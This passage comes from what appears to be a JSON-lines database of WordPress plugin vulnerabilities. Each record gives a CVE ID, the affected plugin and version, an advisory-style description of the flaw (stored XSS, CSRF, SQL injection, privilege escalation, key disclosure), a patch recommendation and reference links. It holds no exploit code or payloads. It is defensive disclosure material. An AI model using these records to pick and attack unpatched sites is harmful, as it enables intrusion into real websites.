replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9331aa66-2eee-4745-b286-fa6db3bd9f37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9331aa66-2eee-4745-b286-fa6db3bd9f37?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button-elementor\\\/tags\\\/1.2.5\\\/includes\\\/rzp-payment-buttons.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button-elementor\\\/tags\\\/1.2.5\\\/includes\\\/rzp-payment-buttons.php#L78\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11870","slug":"event-registration-calendar-by-vcita","versionImpact":"1.4.0","description":"The Event Registration Calendar By vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8cadb97-2f3e-4b00-ad00-118cf23d1592?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8cadb97-2f3e-4b00-ad00-118cf23d1592?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11951","slug":"homey-login-register","versionImpact":"2.4.0","description":"The Homey Login Register plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.4.0. This is due to the plugin allowing users who are registering new accounts to set their own role. This makes it possible for unauthenticated attackers to gain elevated privileges by creating an account with the administrator role.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/homey-booking-wordpress-theme\\\/23338013\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/homey-booking-wordpress-theme\\\/23338013\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67c4066f-b8bc-4cd0-ae47-844af23e003f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67c4066f-b8bc-4cd0-ae47-844af23e003f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31914","slug":"pixel-formbuilder","versionImpact":"1.0.2","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in kamleshyadav Pixel WordPress Form BuilderPlugin & Autoresponder allows Blind SQL Injection. This issue affects Pixel WordPress Form BuilderPlugin & Autoresponder: from n\/a through 1.0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pixel-formbuilder\\\/vulnerability\\\/wordpress-pixel-wordpress-form-builderplugin-autoresponder-1-0-2-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pixel-formbuilder\\\/vulnerability\\\/wordpress-pixel-wordpress-form-builderplugin-autoresponder-1-0-2-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0722","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_state function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/261a1bf0-a147-48c8-878e-f9b725ac74d8\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/261a1bf0-a147-48c8-878e-f9b725ac74d8\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3709","slug":"royal-elementor-addons","versionImpact":"1.3.70","description":"The Royal Elementor Addons plugin for WordPress is vulnerable to unauthenticated API key disclosure in versions up to, and including, 1.3.70 due to the plugin adding the API key to the source code of any page running the MailChimp block. This makes it possible for unauthenticated attackers to obtain a site's MailChimp API key. We recommend resetting any MailChimp API keys if running a vulnerable version of this plugin with the MailChimp block enabled as the API key may have been compromised.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86c9bcf1-c69e-47ca-b74b-8ce6157f520b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86c9bcf1-c69e-47ca-b74b-8ce6157f520b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2938619%40royal-elementor-addons&new=2936984%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2938619%40royal-elementor-addons&new=2936984%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5819","slug":"amazonify","versionImpact":"0.8.1","description":"The Amazonify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 0.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. However, please note that this can also be combined with CVE-2023-5818 for CSRF to XSS.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41adfb58-d79f-40a3-8a7e-f3f08f64659f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41adfb58-d79f-40a3-8a7e-f3f08f64659f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amazonify\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amazonify\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonify\\\/trunk\\\/amazonify.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonify\\\/trunk\\\/amazonify.php#L142\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6633","slug":"site-notes","versionImpact":"2.0.0","description":"The Site Notes WordPress plugin through 2.0.0 does not have CSRF checks in some of its functionalities, which could allow attackers to make logged in users perform unwanted actions, such as deleting administration notes, via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb983d82-b894-41c5-b51f-94d4bba3ba39\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb983d82-b894-41c5-b51f-94d4bba3ba39\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0369","slug":"bulk-edit-post-titles","versionImpact":"5.0.0","description":"The Bulk Edit Post Titles plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bulkUpdatePostTitles function in all versions up to, and including, 5.0.0. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-edit-post-titles\\\/trunk\\\/classes\\\/class.bulk.titles.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-edit-post-titles\\\/trunk\\\/classes\\\/class.bulk.titles.php#L130\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6562","slug":"affiliate-toolkit-starter","versionImpact":"3.5.5","description":"The affiliate-toolkit \u2013 WordPress Affiliate Plugin plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.5.5. This is due to display_errors being set to true. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f810cc65-5a19-4ad7-a6b6-41a9b4f30f4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f810cc65-5a19-4ad7-a6b6-41a9b4f30f4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-toolkit-starter\\\/trunk\\\/lib\\\/apai-io\\\/exeu\\\/apai-io\\\/samples\\\/Search\\\/SimpleSearch.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-toolkit-starter\\\/trunk\\\/lib\\\/apai-io\\\/exeu\\\/apai-io\\\/samples\\\/Search\\\/SimpleSearch.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8440","slug":"essential-addons-for-elementor-lite","versionImpact":"6.0.3","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Fancy Text widget in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5960396-5320-4978-aa82-2e33700daa43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5960396-5320-4978-aa82-2e33700daa43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Fancy_Text.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Fancy_Text.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148624\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148624\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10778","slug":"stax-buddy-builder","versionImpact":"1.7.4","description":"The BuddyPress Builder for Elementor \u2013 BuddyBuilder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.7.4 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/067dde3a-f2d6-44c6-b64e-c8a850dd4d37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/067dde3a-f2d6-44c6-b64e-c8a850dd4d37?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stax-buddy-builder\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stax-buddy-builder\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11930","slug":"taskbuilder","versionImpact":"3.0.6","description":"The Taskbuilder \u2013 WordPress Project & Task Management plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wppm_tasks shortcode in all versions up to, and including, 3.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taskbuilder\\\/trunk\\\/includes\\\/frontend\\\/wppm_tasks_shortcode.php#L123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taskbuilder\\\/trunk\\\/includes\\\/frontend\\\/wppm_tasks_shortcode.php#L123\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210469\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210469\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taskbuilder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taskbuilder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc39d59-7c9d-4d5d-9fb5-b67d2324adaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc39d59-7c9d-4d5d-9fb5-b67d2324adaa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13394","slug":"viewmedica","versionImpact":"1.4.15","description":"The ViewMedica 9 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'viewmedica' shortcode in all versions up to, and including, 1.4.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/viewmedica\\\/trunk\\\/swarm.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/viewmedica\\\/trunk\\\/swarm.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b32c1b63-564c-4c38-a149-d5adabda8a8b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b32c1b63-564c-4c38-a149-d5adabda8a8b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11153","slug":"content-control","versionImpact":"2.5.0","description":"The Content Control \u2013 The Ultimate Content Restriction Plugin! Restrict Content, Create Conditional Blocks & More plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.0 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/content-control\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/content-control\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbe51f96-82b2-4091-acd8-a8131a47eb07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbe51f96-82b2-4091-acd8-a8131a47eb07?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6462","slug":"elisqlreports","versionImpact":"5.25.11","description":"The EZ SQL Reports Shortcode Widget and DB Backup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's SQLREPORT shortcode in all versions up to, and including, 5.25.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318513\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318513\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elisqlreports\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elisqlreports\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6811f19-07fb-4c05-977f-90f9c5d89bb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6811f19-07fb-4c05-977f-90f9c5d89bb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0720","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_folder_order function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d392d0b-f286-44da-aa32-a08d0279baed\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d392d0b-f286-44da-aa32-a08d0279baed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5818","slug":"amazonify","versionImpact":"0.8.1","description":"The Amazonify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.8.1. This is due to missing or incorrect nonce validation on the amazonifyOptionsPage() function. This makes it possible for unauthenticated attackers to update the plugins settings, including the Amazon Tracking ID, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f3c466-bdeb-402f-bf34-bc703f35e1e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f3c466-bdeb-402f-bf34-bc703f35e1e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonify\\\/trunk\\\/amazonify.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonify\\\/trunk\\\/amazonify.php#L142\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6530","slug":"theme-junkie-shortcodes","versionImpact":"0.1.3","description":"The TJ Shortcodes WordPress plugin through 0.1.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e63bf7c-7827-4c4d-b0e3-66354b218bee\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e63bf7c-7827-4c4d-b0e3-66354b218bee\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-6530-tj-shortcodes-stored-xss-poc\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-6530-tj-shortcodes-stored-xss-poc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1336","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the optimizeAllOn function. This makes it possible for unauthenticated attackers to modify image optimization settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca4cf299-9dee-4ebf-83f3-4c3471bd9fb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca4cf299-9dee-4ebf-83f3-4c3471bd9fb0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0368","slug":"wordpress-popup","versionImpact":"7.8.3","description":"The Hustle \u2013 Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.8.3 via hardcoded API Keys. This makes it possible for unauthenticated attackers to extract sensitive data including PII.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6d40b41-540d-476d-afde-970845543933?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6d40b41-540d-476d-afde-970845543933?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/trunk\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/trunk\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#scopes\",\"name\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#scopes\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#manage-settings-via-api\",\"name\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#manage-settings-via-api\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047775\\\/wordpress-popup\\\/trunk\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup\\\/tags\\\/7.8.3\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047775\\\/wordpress-popup\\\/trunk\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup\\\/tags\\\/7.8.3\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10717","slug":"styler-for-ninja-forms-lite","versionImpact":"3.3.4","description":"The Styler for Ninja Forms plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the deactivate_license function in all versions up to, and including, 3.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users. Note: This issue can also be used to add arbitrary options with an empty value.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 